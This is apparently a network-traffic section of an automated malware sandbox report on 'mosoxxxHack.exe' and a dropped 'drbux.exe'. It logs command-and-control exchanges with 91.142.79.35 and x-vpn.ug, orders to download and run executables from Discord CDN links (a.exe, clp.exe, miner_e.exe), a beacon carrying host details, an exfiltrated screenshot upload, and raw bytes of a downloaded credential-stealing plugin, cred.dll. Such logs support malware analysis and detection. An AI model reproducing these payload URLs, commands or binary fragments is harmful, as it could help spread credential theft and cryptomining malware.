Aug 20, 2021 17:11:00.323956966 CEST	10820	OUT	Data Raw: 28 a2 80 12 8a 28 a0 61 45 14 50 02 d1 cd 1c d1 cd 30 0e 68 a3 9a 39 a4 01 45 14 53 10 52 52 d2 52 18 52 f7 a4 a2 80 16 81 45 2d 34 21 0d 14 b4 50 02 50 69 68 a0 02 96 8a 28 00 34 94 b4 1a 60 25 21 a5 a2 90 08 28 34 ec 53 4d 00 14 52 d2 50 01 45 Data Ascii: ((aEP0h9ESRRRRE-4!PPih(4`%!(4SMRPEPEP0-RwEPJZ;RPE`QE1(RQEL@(QGA)i)iM&8p4Zb@EA)At+c,SQBb4Yg 9sF0iT_T
Aug 20, 2021 17:11:00.324347973 CEST	10823	OUT	Data Raw: 3d 88 c1 fd 2b dc bc 03 6f 06 9d e0 6b 69 ff 00 e7 a2 bc f2 b0 19 27 93 fc 80 02 bc a8 f8 23 c4 a3 fe 61 33 fe 6b fe 35 e8 5f 0e f5 8f b2 db bf 86 b5 2f dc 5f 5b 39 f2 e3 72 32 ca 7e 62 3e a3 27 8f 7f 6a e9 cc e7 0a d4 7f 75 24 ec ee ec fa 1c 79 Data Ascii: =+oki'#a3k5_/_[9r2~b>'ju$yd'FbSW7"O&X<Me4yE2g&z2@ureHykrp?lu1nX^AnQ^{o]5X&l#^Zj
Aug 20, 2021 17:11:00.324503899 CEST	10838	OUT	Data Raw: 65 91 d1 58 b4 d1 92 51 b9 1d b7 1e 3a 7b 54 43 56 d4 8e 98 da 6b cd 6f 35 b3 33 b2 89 ad a2 91 e3 2c 72 db 1d 94 b2 02 46 70 a4 0c e7 d6 b1 8c 2a a9 5d f5 ff 00 24 6c e5 49 ab 2f eb 73 77 51 f0 be 95 a5 5d ea a2 ef 5c b8 fb 26 99 3c 76 93 4d 1d Data Ascii: eXQ:{TCVko53,rFp*]$lI/swQ]\&<vMgiqP>PIbG<zW[+=EW6wHn%%Fg5u~_8gXprW FN:GYxfkfy7Xv#}i[oHti)x,gbF>eI!
Aug 20, 2021 17:11:00.350850105 CEST	10841	OUT	Data Raw: 10 94 a0 52 e2 8e d4 c4 15 ea 5f 07 3c 21 a1 78 af fb 6b fb 6a c7 ed 5f 66 f2 3c af df 3a 6d dd e6 6e fb ac 33 f7 47 5f 4a f2 da f6 3f 81 77 16 30 5a f8 95 35 0b 88 61 82 65 b7 53 e7 4a 10 30 c4 a0 f2 48 f5 ac 6b df 91 d8 d2 85 b9 f5 3d 07 fe 15 Data Ascii: R_<!xkj_f<:mn3G_J?w0Z5aeSJ0Hk=st/n.yi2<O5EG*=A=z<?PHKb,I,9\:r0\|psm/M;KaY<bAyk>0zL^Xd
Aug 20, 2021 17:11:00.350965023 CEST	10851	OUT	Data Raw: ff 00 b2 d7 b0 fd 9a c5 ff 00 87 15 e4 df 15 a2 8e dc 44 90 9c a9 97 3f f8 ed 6f 42 ba 94 ad 63 2a b8 67 06 a5 73 c5 c9 34 dc 1a 93 02 93 15 91 dd 73 a0 f0 e7 88 93 4a 8a 5b 7b a1 23 c2 7e 68 f6 00 48 3d c7 3d 8f f9 eb 5b da 77 8b 6c ef ae 7c 89 Data Ascii: D?oBc*gs4sJ[{#~hH==[wl\|#x,e`9"AZRKCFg[j0NoqGC\Zcv]==-_G=kG8vqRU:EsIRq KcR,RN
Aug 20, 2021 17:11:00.351006031 CEST	10859	OUT	Data Raw: af df 49 f9 22 ea 3f dd 20 14 0a 4a 51 d2 ba 0e 51 c2 8a 41 4b 52 48 b4 a2 92 96 81 0b 4b 49 4b 48 90 a2 8a 29 00 52 d2 51 40 0b 45 14 50 01 4b 49 8a 5c 52 60 02 a4 8c 65 d4 7a 9a 68 ab 16 71 ef b9 41 ef 51 51 da 2c aa 6a f3 48 d0 f8 86 98 d2 b4 Data Ascii: I"? JQQAKRHKIKH)RQ@EPKI\R`ezhqAQQ,jHC&zW/WYUuSi^x?hyW=kO}[d+aX``! 5q!Gj4J<S?qpx&)uIhx`f$))SY
Aug 20, 2021 17:11:00.405440092 CEST	10897	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Aug 2021 15:11:00 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Keep-Alive: timeout=5 X-Powered-By: PHP/5.6.37

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49712	91.142.79.35	13400	C:\Users\user\Desktop\mosoxxxHack.exe

Timestamp	kBytes transferred	Direction	Data
Aug 20, 2021 17:09:46.694029093 CEST	2487	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 91.142.79.35:13400 Content-Length: 1408 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Aug 20, 2021 17:09:46.751374960 CEST	2488	IN	HTTP/1.1 100 Continue
Aug 20, 2021 17:09:46.848005056 CEST	2491	IN	HTTP/1.1 200 OK Content-Length: 626 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Fri, 20 Aug 2021 15:09:46 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 55 70 64 61 74 65 54 61 73 6b 3e 3c 61 3a 41 63 74 69 6f 6e 3e 44 6f 77 6e 6c 6f 61 64 41 6e 64 45 78 3c 2f 61 3a 41 63 74 69 6f 6e 3e 3c 61 3a 43 75 72 72 65 6e 74 3e 31 33 38 30 3c 2f 61 3a 43 75 72 72 65 6e 74 3e 3c 61 3a 44 6f 6d 61 69 6e 46 69 6c 74 65 72 2f 3e 3c 61 3a 46 69 6c 74 65 72 2f 3e 3c 61 3a 46 69 6e 61 6c 50 6f 69 6e 74 3e 33 32 31 33 32 31 33 3c 2f 61 3a 46 69 6e 61 6c 50 6f 69 6e 74 3e 3c 61 3a 53 74 61 74 75 73 3e 41 63 74 69 76 65 3c 2f 61 3a 53 74 61 74 75 73 3e 3c 61 3a 54 61 73 6b 41 72 67 3e 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 37 31 30 35 35 37 33 34 32 37 35 35 38 34 38 32 34 33 2f 38 37 36 38 32 38 39 32 37 31 38 32 36 36 33 37 31 31 2f 61 2e 65 78 65 7c 25 74 6d 70 25 5c 61 2e 65 78 65 3c 2f 61 3a 54 61 73 6b 41 72 67 3e 3c 61 3a 54 61 73 6b 49 44 3e 31 3c 2f 61 3a 54 61 73 6b 49 44 3e 3c 61 3a 56 69 73 69 62 6c 65 3e 74 72 75 65 3c 2f 61 3a 56 69 73 69 62 6c 65 3e 3c 2f 61 3a 55 70 64 61 74 65 54 61 73 6b 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:UpdateTask><a:Action>DownloadAndEx</a:Action><a:Current>1380</a:Current><a:DomainFilter/><a:Filter/><a:FinalPoint>3213213</a:FinalPoint><a:Status>Active</a:Status><a:TaskArg>https://cdn.discordapp.com/attachments/710557342755848243/876828927182663711/a.exe\|%tmp%\a.exe</a:TaskArg><a:TaskID>1</a:TaskID><a:Visible>true</a:Visible></a:UpdateTask></GetUpdatesResult></GetUpdatesResponse></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.3	49737	109.234.32.63	80	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe

Timestamp	kBytes transferred	Direction	Data
Aug 20, 2021 17:11:00.750334024 CEST	10898	OUT	POST /hfV3vDtt/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----02829d02c5aecfe2bac73a3162a6e428 Host: x-vpn.ug Content-Length: 94843 Cache-Control: no-cache
Aug 20, 2021 17:11:00.750531912 CEST	10898	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 30 32 38 32 39 64 30 32 63 35 61 65 63 66 65 32 62 61 63 37 33 61 33 31 36 32 61 36 65 34 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------02829d02c5aecfe2bac73a3162a6e428Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 20, 2021 17:11:00.750771046 CEST	10908	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 20, 2021 17:11:00.750849962 CEST	10910	OUT	Data Raw: e9 c7 5c f4 e2 ba 1d 17 c3 3f 0e bc 46 2e 06 95 69 e7 f9 1b 7c cf de 5c 26 dd d9 c7 de 23 3d 0d 73 da 57 89 be cf a3 d9 43 ff 00 0b 0f ec be 5d bc 69 f6 7f ec 5d fe 56 14 0d 9b b1 f3 63 a6 7b e2 bb 7f 05 6a df da 9f 6e ff 00 8a 9b fb 6f cb f2 ff Data Ascii: \?F.i\|\&#=sWC]i]Vc{jnoNw{+s9&K:gjRRjB%3l%--)h7.)XWZv)1@\QK@@SR(QQ(((bb.2SF(
Aug 20, 2021 17:11:00.776715040 CEST	10914	OUT	Data Raw: fa 95 1e c7 4f f6 c6 33 f9 ff 00 05 fe 42 fd b9 ff 00 e7 8f fe 3d ff 00 d6 a8 de 43 33 ee 2b b7 8c 63 34 51 5a 53 c3 53 a7 2e 68 a3 0a f9 86 22 bc 39 2a 4a eb d1 0d a2 94 8a 54 46 91 d5 11 4b 3b 10 15 54 64 92 7a 01 5d 07 1d f4 1b 45 69 5c f8 7b Data Ascii: O3B=C3+c4QZSS.h"9JTFK;Tdz]Ei\{ZG-R44}OU$iu48>P{Jq?rXJ+x~^MZW!}CH-K\Z`p9 w:Z52M6J-`@ )Ns:QB??gL
Aug 20, 2021 17:11:00.776798964 CEST	10921	OUT	Data Raw: 76 dc 6b 9f 82 ee f2 da d6 e2 d6 de f2 e2 1b 6b 9c 79 f0 c7 2b 2a 4b 8e 9b 94 1c 36 3d ea 11 18 00 e0 75 ac 95 39 29 29 3f eb fa b1 b7 b5 56 d3 fa fe ae ce f2 f5 1a fb e2 7f 8a 74 4f 97 fe 26 f2 4d 6b 1e f3 80 26 0c 1e 2e 7b 7c e8 a3 fe 05 53 0d Data Ascii: vkky+K6=u9))?VtO&Mk&.{\|Sv+Oi.8m9 `yk^8Q/U_F.-b[GF2c"K6?tM!>U0\|dy)G~nSmo=u]K
Aug 20, 2021 17:11:00.776962996 CEST	10930	OUT	Data Raw: 65 91 d1 58 b4 d1 92 51 b9 1d b7 1e 3a 7b 54 43 56 d4 8e 98 da 6b cd 6f 35 b3 33 b2 89 ad a2 91 e3 2c 72 db 1d 94 b2 02 46 70 a4 0c e7 d6 b1 8c 2a a9 5d f5 ff 00 24 6c e5 49 ab 2f eb 73 77 51 f0 be 95 a5 5d ea a2 ef 5c b8 fb 26 99 3c 76 93 4d 1d Data Ascii: eXQ:{TCVko53,rFp*]$lI/swQ]\&<vMgiqP>PIbG<zW[+=EW6wHn%%Fg5u~_8gXprW FN:GYxfkfy7Xv#}i[oHti)x,gbF>eI!
Aug 20, 2021 17:11:00.776976109 CEST	10934	OUT	Data Raw: df d4 a3 45 14 77 af 59 1e 08 b4 94 b4 94 31 09 48 69 68 a0 61 4b 48 29 68 40 14 b4 94 b4 08 50 69 69 29 69 89 85 2d 25 2d 50 85 14 ea 68 a5 a0 4c 5a 5a 4a 51 4c 41 4b 49 45 30 1d 45 25 14 c4 2d 14 51 40 85 a2 8a 29 80 b4 e1 4d 14 a0 d3 42 1f 4b Data Ascii: EwY1HihaKH)h@Pii)i-%-PhLZZJQLAKIE0E%-Q@)MBKMW$p4`U\E-1<1@4hIx`iRd8pLPkE6C4znfFp&+892j)ajX=89kfHtOzdOH&nH>Qu*60
Aug 20, 2021 17:11:00.776982069 CEST	10936	OUT	Data Raw: 38 53 69 41 a0 42 8e b4 e1 de 9b 4b 4d 08 5a 28 a5 a6 48 b8 a4 c5 28 14 a0 62 9d 80 6e 28 a5 34 94 02 0a 29 28 a4 01 4b 45 21 a0 05 a5 14 0a 29 80 b4 b4 94 a2 98 85 a3 34 94 50 84 3b 34 0e b4 0a 33 54 03 a8 a6 e6 81 41 36 16 96 92 8a 00 5a 28 a0 Data Ascii: 8SiABKMZ(H(bn(4)(KE!)4P;43TA6Z(SE-%-14JZ8ST!iE6UQIK@hU8STc/iEYGZm(4GN&iiLKf4j,L38)-4h&-$`4+
Aug 20, 2021 17:11:00.802614927 CEST	10939	OUT	Data Raw: 10 94 a0 52 e2 8e d4 c4 15 ea 5f 07 3c 21 a1 78 af fb 6b fb 6a c7 ed 5f 66 f2 3c af df 3a 6d dd e6 6e fb ac 33 f7 47 5f 4a f2 da f6 3f 81 77 16 30 5a f8 95 35 0b 88 61 82 65 b7 53 e7 4a 10 30 c4 a0 f2 48 f5 ac 6b df 91 d8 d2 85 b9 f5 3d 07 fe 15 Data Ascii: R_<!xkj_f<:mn3G_J?w0Z5aeSJ0Hk=st/n.yi2<O5EG*=A=z<?PHKb,I,9\:r0\|psm/M;KaY<bAyk>0zL^Xd
Aug 20, 2021 17:11:00.802660942 CEST	10942	OUT	Data Raw: ff 00 b2 d7 b0 fd 9a c5 ff 00 87 15 e4 df 15 a2 8e dc 44 90 9c a9 97 3f f8 ed 6f 42 ba 94 ad 63 2a b8 67 06 a5 73 c5 c9 34 dc 1a 93 02 93 15 91 dd 73 a0 f0 e7 88 93 4a 8a 5b 7b a1 23 c2 7e 68 f6 00 48 3d c7 3d 8f f9 eb 5b da 77 8b 6c ef ae 7c 89 Data Ascii: D?oBc*gs4sJ[{#~hH==[wl\|#x,e`9"AZRKCFg[j0NoqGC\Zcv]==-_G=kG8vqRU:EsIRq KcR,RN
Aug 20, 2021 17:11:00.856621027 CEST	10996	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Aug 2021 15:11:00 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Keep-Alive: timeout=5 X-Powered-By: PHP/5.6.37

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49714	91.142.79.35	13400	C:\Users\user\Desktop\mosoxxxHack.exe

Timestamp	kBytes transferred	Direction	Data
Aug 20, 2021 17:09:54.625782013 CEST	4126	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate" Host: 91.142.79.35:13400 Content-Length: 1434 Expect: 100-continue Accept-Encoding: gzip, deflate
Aug 20, 2021 17:09:54.682435036 CEST	4126	IN	HTTP/1.1 100 Continue
Aug 20, 2021 17:09:54.917715073 CEST	4128	IN	HTTP/1.1 200 OK Content-Length: 145 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Fri, 20 Aug 2021 15:09:54 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 56 65 72 69 66 79 55 70 64 61 74 65 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><VerifyUpdateResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49720	109.234.32.63	80	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe

Timestamp	kBytes transferred	Direction	Data
Aug 20, 2021 17:10:46.704149961 CEST	7753	OUT	POST /hfV3vDtt/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: x-vpn.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 33 31 26 73 64 3d 33 30 30 38 37 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 31 30 36 34 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.31&sd=30087f&os=1&bi=1&ar=1&pc=910646&un=user&dm=&av=13&lv=0
Aug 20, 2021 17:10:46.799858093 CEST	7851	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Aug 2021 15:10:46 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=5 Vary: Accept-Encoding X-Powered-By: PHP/5.6.37 Data Raw: 63 38 0d 0a 3c 63 3e 31 30 30 30 30 32 35 30 30 31 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 37 31 30 35 35 37 33 34 32 37 35 35 38 34 38 32 34 33 2f 38 37 36 38 32 38 36 38 31 38 31 35 38 37 31 34 38 38 2f 63 6c 70 2e 65 78 65 23 31 30 30 30 30 32 36 30 30 31 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 37 31 30 35 35 37 33 34 32 37 35 35 38 34 38 32 34 33 2f 38 37 36 38 32 38 39 37 33 34 37 35 31 36 38 32 37 36 2f 6d 69 6e 65 72 5f 65 2e 65 78 65 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: c8<c>1000025001https://cdn.discordapp.com/attachments/710557342755848243/876828681815871488/clp.exe#1000026001https://cdn.discordapp.com/attachments/710557342755848243/876828973475168276/miner_e.exe#<d>0
Aug 20, 2021 17:10:46.801348925 CEST	7852	OUT	GET /hfV3vDtt/plugins/cred.dll HTTP/1.1 Host: x-vpn.ug
Aug 20, 2021 17:10:46.828557014 CEST	7853	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Aug 2021 15:10:46 GMT Content-Type: application/octet-stream Content-Length: 127488 Connection: keep-alive Keep-Alive: timeout=5 Last-Modified: Mon, 19 Jul 2021 17:18:46 GMT ETag: "1403ad6-1f200-5c77d213c6980" Accept-Ranges: bytes Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 96 01 00 00 58 00 00 00 00 00 00 88 a4 01 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 02 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 f0 01 00 40 00 00 00 00 e0 01 00 26 0e 00 00 00 20 02 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 94 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 a0 94 01 00 00 10 00 00 00 96 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 b4 13 00 00 00 b0 01 00 00 14 00 00 00 9a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 dd 09 00 00 00 d0 01 00 00 00 00 00 00 ae 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 26 0e 00 00 00 e0 01 00 00 10 00 00 00 ae 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 40 00 00 00 00 f0 01 00 00 02 00 00 00 be 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 94 1d 00 00 00 00 02 00 00 1e 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 14 00 00 00 20 02 00 00 14 00 00 00 de 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 00 00 00 00 00 f2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 0a 06 53 74 72 69 6e 67 58 10 40 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*X@@@& CODE `DATA@BSS.idata&@.edata@@P.reloc@P.rsrc @P@@P@StringX@
Aug 20, 2021 17:10:46.828591108 CEST	7855	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 10 40 00 04 00 00 00 00 00 00 00 78 3b 40 00 84 3b 40 00 88 3b 40 00 8c 3b 40 00 80 3b 40 00 f8 38 40 00 14 39 40 00 50 39 40 00 07 54 4f 62 6a 65 63 74 64 10 40 00 07 07 54 4f 62 6a 65 63 74 Data Ascii: X@x;@;@;@;@;@8@9@P9@TObjectd@TObjectX@System@IInterfaceFSystemD$AJD$_JD$iJ@@@F@@L@@
Aug 20, 2021 17:10:46.828619957 CEST	7856	IN	Data Raw: 06 e8 4d fe ff ff 84 c0 75 04 33 c0 eb 18 b0 01 eb 14 8b 06 8b 00 89 06 8b 06 3b 44 24 0c 0f 85 59 ff ff ff 33 c0 83 c4 10 5d 5f 5e 5b c3 90 53 56 57 8b da 8b f0 81 fe 00 00 10 00 7d 07 be 00 00 10 00 eb 0c 81 c6 ff ff 00 00 81 e6 00 00 ff ff 89 Data Ascii: Mu3;D$Y3]_^[SVW}sjh Vj4;t#AuhjP3_^[SVWUCjh hU;usjh VU;t#Aeuh
Aug 20, 2021 17:10:46.828650951 CEST	7857	IN	Data Raw: 90 53 83 c4 e8 8b d9 8d 88 ff 3f 00 00 81 e1 00 c0 ff ff 89 0c 24 03 d0 81 e2 00 c0 ff ff 89 54 24 04 8b 44 24 04 3b 04 24 76 5f 8b cb 8b 54 24 04 2b 14 24 8b 04 24 e8 1d fd ff ff 8d 4c 24 08 8b d3 b8 f4 d5 41 00 e8 5d f9 ff ff 8b 5c 24 08 85 db Data Ascii: S?$T$D$;$v_T$+$$L$A]\$tL$T$nD$D$D$D$\|$tT$A3[UQ3Uh@d2d"hA=EAthAACA9 A/hj_A
Aug 20, 2021 17:10:46.828680992 CEST	7859	IN	Data Raw: c4 0c 5d 5f 5e 5b c3 53 56 83 c4 f4 8b da 8b f0 89 34 24 8b 04 24 89 58 08 8b 04 24 03 c3 83 e8 0c 89 58 08 81 fb 00 10 00 00 7f 76 8b c3 85 c0 79 03 83 c0 03 c1 f8 02 8b 15 1c d6 41 00 8b 54 82 f4 89 54 24 04 83 7c 24 04 00 75 23 8b 15 1c d6 41 Data Ascii: ]_^[SV4$$X$XvyATT$\|$u#A$L$$P$$D$D$$T$P$T$D$$D$$PV<\|uAAD$$AD$D$$T$P$T$D$$D$
Aug 20, 2021 17:10:46.828704119 CEST	7860	IN	Data Raw: 68 23 25 40 00 80 3d 45 d0 41 00 00 74 0a 68 c4 d5 41 00 e8 f1 ed ff ff c3 e9 27 19 00 00 eb e5 8b 45 fc 5b 8b e5 5d c3 90 55 8b ec 83 c4 f0 53 8b d8 33 c0 a3 c0 d5 41 00 80 3d bc d5 41 00 00 75 1f e8 da f5 ff ff 84 c0 75 16 c7 05 c0 d5 41 00 08 Data Ascii: h#%@=EAthA'E[]US3A=AuuAE3Uh&@d2d"=EAthA]EEEuA A%)AtSE@\|tAU+UU;B
Aug 20, 2021 17:10:46.828733921 CEST	7862	IN	Data Raw: 01 c3 b0 02 e9 86 00 00 00 89 10 89 c8 ff 15 40 b0 41 00 09 c0 75 eb c3 b0 01 e9 70 00 00 00 85 d2 74 10 50 89 d0 ff 15 3c b0 41 00 59 09 c0 74 e7 89 01 c3 8d 40 00 89 15 04 b0 41 00 e8 39 1a 00 00 c3 53 56 8b f2 8b d8 80 e3 7f 83 3d 08 d0 41 00 Data Ascii: @AuptP<AYt@A9SV=AtAu7w3HA3^[$PRQ\|7YZXu1@S\7[VW\|$1t+~9)@\|
Aug 20, 2021 17:10:46.828821898 CEST	7863	IN	Data Raw: f7 ee 50 57 8b 03 50 ff 55 0c 85 c0 75 11 e8 6e e2 ff ff e8 69 fb ff ff 33 c0 89 45 fc eb 3f 8b 45 fc 33 d2 f7 73 08 89 45 fc 8b 45 14 85 c0 74 0a 8b 45 14 8b 55 fc 89 10 eb 23 3b 75 fc 74 1e 8b 45 08 e8 39 fb ff ff 33 c0 89 45 fc eb 0f b8 67 00 Data Ascii: PWPUuni3E?E3sEEtEU#;utE93Eg(3EE_^[Y]US]ShhL/@jd[[]SV3fCf=r/f=w)f%f=uSuS$tHAtg^[fxuP;PsP
